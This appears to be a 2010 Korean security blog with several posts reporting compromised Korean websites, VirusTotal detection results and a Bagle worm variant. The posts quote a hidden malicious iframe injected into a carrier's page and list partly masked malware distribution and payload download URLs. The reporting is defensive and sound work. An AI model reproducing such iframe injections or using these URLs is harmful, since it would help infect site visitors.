posted by Kwan's 2010. 7. 15. 08:51

안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.14 -
AhnLab-V3 2010.07.15.00 2010.07.14 -
AntiVir 8.2.4.10 2010.07.14 -
Antiy-AVL 2.0.3.7 2010.07.14 -
Authentium 5.2.0.5 2010.07.15 -
Avast 4.8.1351.0 2010.07.14 -
Avast5 5.0.332.0 2010.07.15 -
AVG 9.0.0.836 2010.07.15 Cryptic.AON
BitDefender 7.2 2010.07.14 -
CAT-QuickHeal 11.00 2010.07.14 -
ClamAV 0.96.0.3-git 2010.07.15 -
Comodo 5430 2010.07.15 -
DrWeb 5.0.2.03300 2010.07.15 -
eSafe 7.0.17.0 2010.07.14 -
eTrust-Vet 36.1.7706 2010.07.14 -
F-Prot 4.6.1.107 2010.07.15 -
F-Secure 9.0.15370.0 2010.07.15 -
Fortinet 4.1.143.0 2010.07.14 -
GData 21 2010.07.15 -
Ikarus T3.1.1.84.0 2010.07.14 -
Jiangmin 13.0.900 2010.07.14 -
Kaspersky 7.0.0.125 2010.07.14 -
McAfee 5.400.0.1158 2010.07.15 -
McAfee-GW-Edition 2010.1 2010.07.14 -
Microsoft 1.5902 2010.07.15 -
NOD32 5278 2010.07.14 -
Norman 6.05.11 2010.07.14 -
nProtect 2010-07-14.01 2010.07.14 -
Panda 10.0.2.7 2010.07.14 Suspicious file
PCTools 7.0.3.5 2010.07.15 -
Prevx 3.0 2010.07.15 -
Rising 22.56.02.04 2010.07.14 -
Sophos 4.55.0 2010.07.15 -
Sunbelt 6582 2010.07.14 -
SUPERAntiSpyware 4.40.0.1006 2010.07.15 Trojan.Agent/Gen-Backdoor
Symantec 20101.1.1.7 2010.07.14 -
TheHacker 6.5.2.1.313 2010.07.13 -
TrendMicro 9.120.0.1004 2010.07.14 -
TrendMicro-HouseCall 9.120.0.1004 2010.07.15 -
VBA32 3.12.12.6 2010.07.14 -
ViRobot 2010.7.12.3932 2010.07.14 -
VirusBuster 5.0.27.0 2010.07.14 -

Jiangmin 이후로 또 다시 하나가 추가 되었네요.. 이 제품이 어떤지 기대가 됩니다 !!

제품은

SUPERAntiSpyware Free Edition 무료 !!
SUPERAntiSpyware Professional 유료 !! (
29.95$)

SUPERAntiSpyware 홈페이지 : http://www.superantispyware.com/index.html

댓글을 달아 주세요

posted by Kwan's 2010. 7. 9. 14:34
지금 현재 모 휴대폰 통신사 큐x텔에는 악성 아이프레임이 삽입되어서 연결하고 있는것으로 보인다,.
사이트 내 소스를 보면 금방 악성코드가 삽입되어 있는것을 볼 수가 있다 !!
</script>
</head>
<iframe height=0 width=0 Src= http://110.xx.139.2x1/css/Lib.asp </iframe>
<body style="margin:0" bgcolor="#ffffff">
<script language="JavaScript">flash('/inc/flash/main.swf','936','232','1');</script>

몇주동안 잠잠 하더니 자시 한번 악성코드에 감염된거 같다. 2주만에 다시 그러니 관리자가 뭐하고 있는지. 그래도 스크립트는 오래된것이 아니라 그런지 대부분의 업체에서 전부 진단을 함으로 신고 할 필요가 없을듯 싶다. 최종파일 위치까지 예전이랑 똑같아서 이제는 그럴려니 하고 넘어간다. 그래도 통신사인데 휴대폰 업데이트나 , 정보를 찾아가는 사람들이 백신이 없다면 감염되기 쉽상일꺼 같다. 빨리 관리자 분이 보셔서 삭제하길 희망한다. !!

감염 사이트 : http://www.cuxxtel.com
악성유포지 :  http://110.xx.139.2x1/css/Lib.asp
최종파일 : http://61.1xx.x.93/css/isa.exe

[바이러스 토탈 결과]

검사 파일: lib.asp 전송 시각: 2010.07.09 05:04:15 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.09 Virus.JS.Downloader.QJ!IK
AhnLab-V3 2010.07.09.00 2010.07.08 JS/Downloader
AntiVir 8.2.4.10 2010.07.08 JS/Drop.A.5851
Antiy-AVL 2.0.3.7 2010.07.08 -
Authentium 5.2.0.5 2010.07.09 -
Avast 4.8.1351.0 2010.07.08 JS:Downloader-QJ
Avast5 5.0.332.0 2010.07.08 JS:Downloader-QJ
AVG 9.0.0.836 2010.07.08 Script/Exploit
BitDefender 7.2 2010.07.09 Trojan.Script.407264
CAT-QuickHeal 11.00 2010.07.09 -
ClamAV 0.96.0.3-git 2010.07.08 -
Comodo 5368 2010.07.09 -
DrWeb 5.0.2.03300 2010.07.09 -
eSafe 7.0.17.0 2010.07.08 -
eTrust-Vet 36.1.7693 2010.07.08 -
F-Prot 4.6.1.107 2010.07.08 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.07.09 Trojan.Script.407264
Fortinet 4.1.133.0 2010.07.08 -
GData 21 2010.07.09 Trojan.Script.407264
Ikarus T3.1.1.84.0 2010.07.09 Virus.JS.Downloader.QJ
Jiangmin 13.0.900 2010.07.08 -
Kaspersky 7.0.0.125 2010.07.09 Trojan-Downloader.JS.Agent.fhk
McAfee 5.400.0.1158 2010.07.09 -
McAfee-GW-Edition 2010.1 2010.07.05 Heuristic.BehavesLike.JS.Exploit.A
Microsoft 1.5902 2010.07.08 -
NOD32 5263 2010.07.08 probably a variant of JS/TrojanDownloader.Agent
Norman 6.05.11 2010.07.08 -
nProtect 2010-07-08.01 2010.07.08 Script-JS/W32.Agent.WH
Panda 10.0.2.7 2010.07.08 -
PCTools 7.0.3.5 2010.07.09 -
Prevx 3.0 2010.07.09 -
Rising 22.55.04.01 2010.07.09 Trojan.DL.Script.JS.Agent.qx
Sophos 4.54.0 2010.07.09 JS/Agent-MZX
Sunbelt 6562 2010.07.09 -
Symantec 20101.1.0.89 2010.07.09 -
TheHacker 6.5.2.1.311 2010.07.08 -
TrendMicro 9.120.0.1004 2010.07.09 -
TrendMicro-HouseCall 9.120.0.1004 2010.07.09 -
VBA32 3.12.12.6 2010.07.08 -
ViRobot 2010.6.29.3912 2010.07.09 JS.S.Agent.5851
VirusBuster 5.0.27.0 2010.07.08 -
 
추가 정보
File size: 5851 bytes
MD5...: 51e7b5fe2fa7ef45de3b3671ba91b011
SHA1..: e6e7dd63b6de5b8b24c5a91d001d23a01de8186b
SHA256: 1d373a0cd0b239795370655695fb7db3138ab1aa1a4cb4df676f72150d82a7b9
검사 파일: isa.exe 전송 시각: 2010.07.09 05:04:22 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.09 Trojan.Peed!IK
AhnLab-V3 2010.07.09.00 2010.07.08 Win-Trojan/Onlinegamehack.55296.G
AntiVir 8.2.4.10 2010.07.08 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.07.08 -
Authentium 5.2.0.5 2010.07.09 -
Avast 4.8.1351.0 2010.07.08 Win32:Malware-gen
Avast5 5.0.332.0 2010.07.08 Win32:Malware-gen
AVG 9.0.0.836 2010.07.08 PSW.Generic8.DOZ
BitDefender 7.2 2010.07.09 Trojan.Generic.KD.18284
CAT-QuickHeal 11.00 2010.07.09 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.07.08 Trojan.Agent-164869
Comodo 5368 2010.07.09 -
DrWeb 5.0.2.03300 2010.07.09 -
eSafe 7.0.17.0 2010.07.08 Win32.TRCrypt.ZPACK
eTrust-Vet 36.1.7693 2010.07.08 -
F-Prot 4.6.1.107 2010.07.08 -
F-Secure 9.0.15370.0 2010.07.09 Trojan.Generic.KD.18284
Fortinet 4.1.133.0 2010.07.08 -
GData 21 2010.07.09 Trojan.Generic.KD.18284
Ikarus T3.1.1.84.0 2010.07.09 Trojan.Peed
Jiangmin 13.0.900 2010.07.08 Trojan/PSW.Magania.anlt
Kaspersky 7.0.0.125 2010.07.09 -
McAfee 5.400.0.1158 2010.07.09 PWS-Mmorpg!pq
McAfee-GW-Edition 2010.1 2010.07.05 Heuristic.LooksLike.Trojan.Crypt.ZPACK.B
Microsoft 1.5902 2010.07.08 PWS:Win32/Magania.gen
NOD32 5263 2010.07.08 -
Norman 6.05.11 2010.07.08 W32/Suspicious_Gen2.BHOYR
nProtect 2010-07-08.01 2010.07.08 Trojan/W32.Agent.55296.IL
Panda 10.0.2.7 2010.07.08 Trj/CI.A
PCTools 7.0.3.5 2010.07.09 -
Prevx 3.0 2010.07.09 High Risk Cloaked Malware
Rising 22.55.04.01 2010.07.09 Trojan.Win32.Generic.521B263B
Sophos 4.54.0 2010.07.09 Sus/UnkPack-C
Sunbelt 6562 2010.07.09 Trojan.Win32.Generic!BT
Symantec 20101.1.0.89 2010.07.09 -
TheHacker 6.5.2.1.311 2010.07.08 -
TrendMicro 9.120.0.1004 2010.07.09 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.07.09 -
VBA32 3.12.12.6 2010.07.08 Malware-Dropper.Win32.Inject.gen
ViRobot 2010.6.29.3912 2010.07.09 Trojan.Win32.PSWMagania.55296.K
VirusBuster 5.0.27.0 2010.07.08 -
 
추가 정보
File size: 55296 bytes
MD5...: a4bd25915a827fe01c44926cc44273fe
SHA1..: 0748e6f3d2a27a5b852737bd40a86d9dcdce06c3
SHA256: d030b52bafbe52bb6e2527e94a325b1e3c996e17eab2789c601179bdb5e9c9ea


[이전글]

[security/악성코드 유포] - http://cpm2.XX66.org:88/Xo/Xi05.htm : JS:CVE-2010-0806-AK
[security/악성코드 유포] - http://gft54577.3xx2.org:6677/x/index.html 변조!!

댓글을 달아 주세요

  1. hoo 2010.07.09 16:41  Addr  Edit/Del  Reply

    줄기차게 나오네요..
    잘보고 갑니다~

    • Kwan's 2010.07.10 17:30 신고  Addr  Edit/Del

      Lib.asp 는 항상 똑같은곳에서 유포하는데 아직까지도 삭제되지않는거 보니 관리자가 손을 놓고 있나봐요~

posted by Kwan's 2010. 7. 6. 12:21

 

오늘 아침에 받는 메일링에 Bagle.trash 라는것에 감염 되는것을 많이 봤다.
그중 국내 유입 되어있는 사이트 몇개 봤는데 바이러스 토탈에서 걸려 주는 업체는 몇 없는거 같다.
아니 안티버 하나 뿐이다. 베이글이라는 샘플은 많이 봐왔지만 이번 것은 처음 보는 샘플 이었다.
샘플을 봐주신 처리님은 원본 샘플이 있어야 좀 더 자세히 알수 있을거라 했다. 그래도 신고는 해놨으니 진단명이 기대가 된다 !! 어떤식으로 하는지는 나도 구체적으로 알 수 없지만 나쁜 짓을 하는건 맞는거 같다 !! 다른 분께도 네이트온으로 도움을 청해 봐야겠다 !!

샘플 전송 : 안철수연구소 , 이스트 소프트 !!


[국내 감염 사이트]

http://xxxuang.co.kr/images/mxd.jpg
http://www.xxxcson.co.kr/images/mxd.jpg
http://www.xxxcson.co.kr/images/mea/dc.jpg
http://xx09.net/images/mxd.jpg
http://eudxxxing.mireene.com/images/mxd.jpg


[FortiGuard Center]

Alias/es Email-Worm.Win32.Bagle.hw, WORM_BAGLE.IE, W32/Mitglieder.VY, Win32.Bagle.HW@mm
Release Date Feb 13, 2007
Detection Availability
Active Database Extended Database
FortiGate lowhigh
FortiClient
FortiMail N/A
Current Antivirus Definition Database Version
Description

Visible Symptoms

  • The following folders exist:
    • C:\Documents and Settings\{UserName}\Application Data\m
    • C:\Documents and Settings\{UserName}\Application Data\m\shared
  • The following files exist:
    • C:\Documents and Settings\{UserName}\Application Data\m\srvlist.oct
    • C:\Documents and Settings\{UserName}\Application Data\m\data.oct
    • C:\Documents and Settings\{UserName}\Application Data\m\list.oct
    • C:\Documents and Settings\{UserName}\Application Data\m\flec006.exe
  • Several ZIP files in exist in the C:\Documents and Settings\{UserName}\Application Data\m\shared  folder.

    Detailed Analysis

  • Creates the following folders:
    • C:\Documents and Settings\{UserName}\Application Data\m
    • C:\Documents and Settings\{UserName}\Application Data\m\shared
  • Searches for a process whose name contains the string flec006.exe, and attempts to terminate it.

  • Copies itself to C:\Documents and Settings\{UserName}\Application Data\m\flec006.exe  and executes it with the parameter -upd.

  • Adds the following registry:
    • key: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    • value: mule_st_key
    • data: "C:\Documents and Settings\{UserName}\Application Data\m\flec006.exe"
    • key: HKCU\Software\MuleAppData
    • value: ListTime
    • data: {Date of today such as 6}
    • key: HKCU\Software\MuleAppData
    • value: FileTime
    • data: {Date of today such as 6}
    • key: HKCU\Software\MuleAppData
    • value: ServerTime
    • data: {Date of today such as 6}
  • Attempts to download a file from any of the following URLs:
    • http://www.disco{REMOVED}.com/1/servernames.php
    • http://dev{REMOVED}.com/img/servernames.php
    • http://cam{REMOVED}.com.br/1/servernames.php
    • http://www.in{REMOVED}.gr/1/servernames.php
    The downloaded file is saved as C:\Documents and Settings\{UserName}\Application Data\m\srvlist.oct. This file contains predefined eMule server addresses and ports.

  • Attempts to download a file from any of the following URLs:
    • http://www.disco{REMOVED}.com/1/mxd.jpg
    • http://www.pop{REMOVED}.nl/mxd.jpg
    • http://port{REMOVED}.com/mxd.jpg
    The downloaded file is saved as C:\Documents and Settings\{UserName}\Application Data\m\data.oct. This file is detected as W32/Beagle.HW@mm.

  • Attempts to download a file from any of the following URLs:
    • http://www.disco{REMOVED}.com/1/filenames.php
    • http://dev{REMOVED}.com/img/filenames.php
    • http://cam{REMOVED}.com.br/1/filenames.php
    • http://www.in{REMOVED}.gr/1/filenames.php
    The downloaded file is saved as C:\Documents and Settings\{UserName}\Application Data\m\list.oct.

  • Generates several ZIP files with the names found in srvlist.oct. The ZIP file contains the following files:
    • patch.nfo: a text file containing the string www.{RANDOM NUMBER}.com.
    • a copy of data.oct, but with random overlay data.
  • Sets up an eMule server for virus sharing.

  • [바이러스 토탈]

    검사 파일: mxd.jpg 전송 시각: 2010.07.06 01:16:56 (UTC)
    안티바이러스 엔진 버전 정의 날짜 검사 결과
    a-squared 5.0.0.31 2010.07.06 -
    AhnLab-V3 2010.07.06.00 2010.07.05 -
    AntiVir 8.2.4.2 2010.07.05 TR/Bagle.trash
    Antiy-AVL 2.0.3.7 2010.07.02 -
    Authentium 5.2.0.5 2010.07.05 -
    Avast 4.8.1351.0 2010.07.06 -
    Avast5 5.0.332.0 2010.07.06 -
    AVG 9.0.0.836 2010.07.05 -
    BitDefender 7.2 2010.07.06 -
    CAT-QuickHeal 11.00 2010.06.30 -
    ClamAV 0.96.0.3-git 2010.07.05 -
    Comodo 5330 2010.07.05 -
    DrWeb 5.0.2.03300 2010.07.06 -
    eSafe 7.0.17.0 2010.07.05 -
    eTrust-Vet 36.1.7687 2010.07.05 -
    F-Prot 4.6.1.107 2010.07.05 -
    F-Secure 9.0.15370.0 2010.07.06 -
    Fortinet 4.1.133.0 2010.07.04 -
    GData 21 2010.07.06 -
    Ikarus T3.1.1.84.0 2010.07.06 -
    Jiangmin 13.0.900 2010.07.03 -
    Kaspersky 7.0.0.125 2010.07.06 -
    McAfee 5.400.0.1158 2010.07.06 -
    McAfee-GW-Edition 2010.1 2010.07.05 -
    Microsoft 1.5902 2010.07.03 -
    NOD32 5253 2010.07.05 -
    Norman 6.05.10 2010.07.05 -
    nProtect 2010-07-05.01 2010.07.05 -
    Panda 10.0.2.7 2010.07.06 -
    PCTools 7.0.3.5 2010.07.06 -
    Prevx 3.0 2010.07.06 -
    Rising 22.55.00.04 2010.07.05 -
    Sophos 4.54.0 2010.07.06 -
    Sunbelt 6546 2010.07.05 -
    Symantec 20101.1.0.89 2010.07.06 -
    TheHacker 6.5.2.1.308 2010.07.05 -
    TrendMicro 9.120.0.1004 2010.07.05 -
    TrendMicro-HouseCall 9.120.0.1004 2010.07.06 -
    VBA32 3.12.12.5 2010.07.05 -
    ViRobot 2010.6.29.3912 2010.07.05 -
    VirusBuster 5.0.27.0 2010.07.05 -
     
    추가 정보
    File size: 1068036 bytes
    MD5...: 39773a87aa37376dc0683385e182fe93
    SHA1..: 8bce94f8a5c0d25fea3af195044e272d482f096d
    SHA256: 8602c23dac1168f3b3bf7f0d1ce5afc094500599701186e6e25544742c4f742e


    이스트 소프트 : 파일 자체만으론 실행이 안되고, 다른거에의해 데이터가 쓰일거 같네요.. 정확한것은 분석을 많이 해봐야할거같은데 정보가 부족해서 오래걸릴거 같습니다 . - OO 님 -

    안철수 연구소 : 분석중 !!

    댓글을 달아 주세요

    1. hoo 2010.07.06 15:40  Addr  Edit/Del  Reply

      베이글 변종이 또 나왔군요..
      참.. 오랫동안 사랑(?) 받는 애물단지네요.. ^^

      • Kwan's 2010.07.06 16:14 신고  Addr  Edit/Del

        변종인거 같은데 원본 파일이 있어야 아마도 확실하게 판단을 내릴수 있지않을까 합니다!
        제가 가지고 있는건 jpg 밖에 없어서요~

    posted by Kwan's 2010. 7. 5. 13:20

    1. 사이트

    씨x통 : http://www.cxxxtong.com

    Z-xxack : http://www.zxxxck.org

    프x시안 , 롤x볼 外 5곳 : http://www.prxxxxan.com 

    주xx 닷컴 : http://xuxunxx.joins.com

    2. 유포지

    씨x통 : http://dXXXbucapXXal.co.kr/css/mm.asp ~> 유포 호스트 !!
              http://dXXXbucapXXal.co.kr/css/index.htm ~> 최종파일 다운 !!
              http://dXXXbucapXXal.co.kr/css/fop.htm ~> SWF 로 연결 !!
              http://dXXXbucapXXal.co.kr/css/poc.swf
              http://dXXXbucapXXal.co.kr/css/top.txt ~> 최종파일 다운 !!

     

    Z-xxxxk : http://www.zXXXXk.org/birdman/CXE-2010-1297/ankey.html ~> SWF 로 연결 !! 및 최종파일 다운 !!
                  http://www.zXXXXk.org/birdman/CXE-2010-1297/anhey.swf

     

    프x시안 , 롤x볼 外 5곳 : http://22XXX.com/XX/y.js ~> 유포 호스트 !!
                                      http://22XXX.com/XX/ad.html
                                      http://22XXX.com/XX/ie.html
                                      http://22XXX.com/XX/a.gif ~> 최종파일 다운 !!
                                      http://22XXX.com/XX/XIGUA.GIF

     

    주xx 닷컴 : http://junXXoXXnia.nefficient.co.kr/2.js
                    http://XXXX.geXXir.com/XXXX_inc/Quiz_news.asp

     

    3. 기타 사항

    http://junXXoXXnia.neXXicient.co.kr/cookie.js

    4. 최종 파일 !!

    index.htm , top.txt : http://xx.74.xx6.x4/axxxn/H.exe

    ankey.html : http://2xxx.in/log.exe

    a.gif : http://22XXX.com/XX/s.exe

    Quiz_news.asp , cookie.js : http://junXXoXXnia.neXXicient.co.kr/test0.exe

    5. 바이러스 토탈

    mm.asp : http://www.virustotal.com/ko/analisis/617063be17a4e3a98ed498e263e20631d73e58f5297f533f2a837ed9ae8805e0-1278299215 

    index.htm : http://www.virustotal.com/ko/analisis/e7ecd7c13e7e16d88db64eff66d741ecef0b6042b1c0d9a1040addfe8a233561-1278299220

    fop.htm : http://www.virustotal.com/ko/analisis/400d0f573100c9e24d84be4242920651f8b096d7fb40b814e9618f2a7a9a3799-1278299227 

    poc.swf : http://www.virustotal.com/ko/analisis/7beb540f2e4eba936423f864df729bf6743057e78d9c6db0028de48c1b96accf-1278299248

    top.txt : http://www.virustotal.com/ko/analisis/d47b751351eb72e7ac6468382705065ae7f24710dbf3daf5e2f127282210a179-1278299488

    ankey.html : http://www.virustotal.com/ko/analisis/7d0ff099a5b7781064638a1a8f569736ddd8b6f20c17b90055e1bd79f83dcb1c-1278299511

    anhey.swf : http://www.virustotal.com/ko/analisis/725f0cc85e34151e7e6af81a4f221b47a6825944cbaf68a4b5daf4023e5143e4-1278299518

    y.js : http://www.virustotal.com/ko/analisis/e4d46c8276469b7706a2a6282a12d29a9cd6e348dcf313cb930148bd0c7ec65c-1278299624

    ad.html : http://www.virustotal.com/ko/analisis/11194104c1dfdfd0d3a3297e8a7445288fcf97b1579b58d2cd7df84747c7a139-1278299631

    a.gif : http://www.virustotal.com/ko/analisis/89bc7d0e3b8de3aeb755e6c3819251c6875c35146c885ab5470d6eebaeb69385-1278299651

    Quiz_news.asp :  http://www.virustotal.com/ko/analisis/950bf1a4c7f7135a2dd78a58b5ac786dad9e09ff0b7b478a6da0f6a9f2e039ca-1278299818

    H.exe : http://www.virustotal.com/ko/analisis/d22218c9b579f11e8061dea85986ee0b7d9d84e059ee098bb423bfc284d19555-1278299976

    s.exe : http://www.virustotal.com/ko/analisis/dd2c070bda1d1df3ebb6dd4b7f37c212c2b643b521d09fc295f3a71442860f7b-1278300039

    test0.exe : http://www.virustotal.com/ko/analisis/ae24b900a8a67799a5878cbb793d7f9ade0141fc67fa1dde0c6d492ac2608e7e-1278300045

    [이스트 소프트]

    모든 샘플 업데이트 완료 !!

    [안철수연구소]

    1. y.js ~> 분석중
    2. top.txt ~> 분석중
    3. ankey.html ~> 분석중
    4. poc.swf ~> 분석중
    5. index.htm ~> 분석중
    6. ad.html ~> V3 : JS/CVE-2010-0249
    7. s.exe ~> V3 : Dropper/Malware.6144.H(추가 : 2010.07.05.00)
    8. Quiz_news.asp ~> V3 : JS/Agent(추가 : 2010.07.01.04)
    9. test0.exe ~> V3 : Win-Trojan/Injector.55296.J(추가 : 2010.07.01.04)
    10. a.gif ~> V3 : JS/Exploit-shellcode(추가 : 2010.07.01.04)
    11. mm.asp ~> V3 : JS/Exploit-cve(추가 : 2010.06.24.05)
    12. fop.htm ~> V3 : JS/Agent(추가 : 2010.06.24.05)
    13. H.exe ~> V3 : Win-Trojan/Downloader.108399(추가 : 2010.06.21.02)
    14. anhey.swf ~> V3 : Win-Trojan/Swf-exploit(추가 : 2010.06.14.02)

    * 추후 샘플진단사항은 댓글로 달겠습니다 !!

    이번주는 놀러갔다오는 바람에 별로 찾은게 없네요!!ㅠ
    조금씩 부족해 지고 있지만 이해해 주세요!
    날씨도 매우 더운데 더위 조심하시고 이번주도 즐거운 하루 보내세요!

    이번주 도와 주신분 : JK님 바이쭌님 처리님 네오님 감사합니다 !!

    댓글을 달아 주세요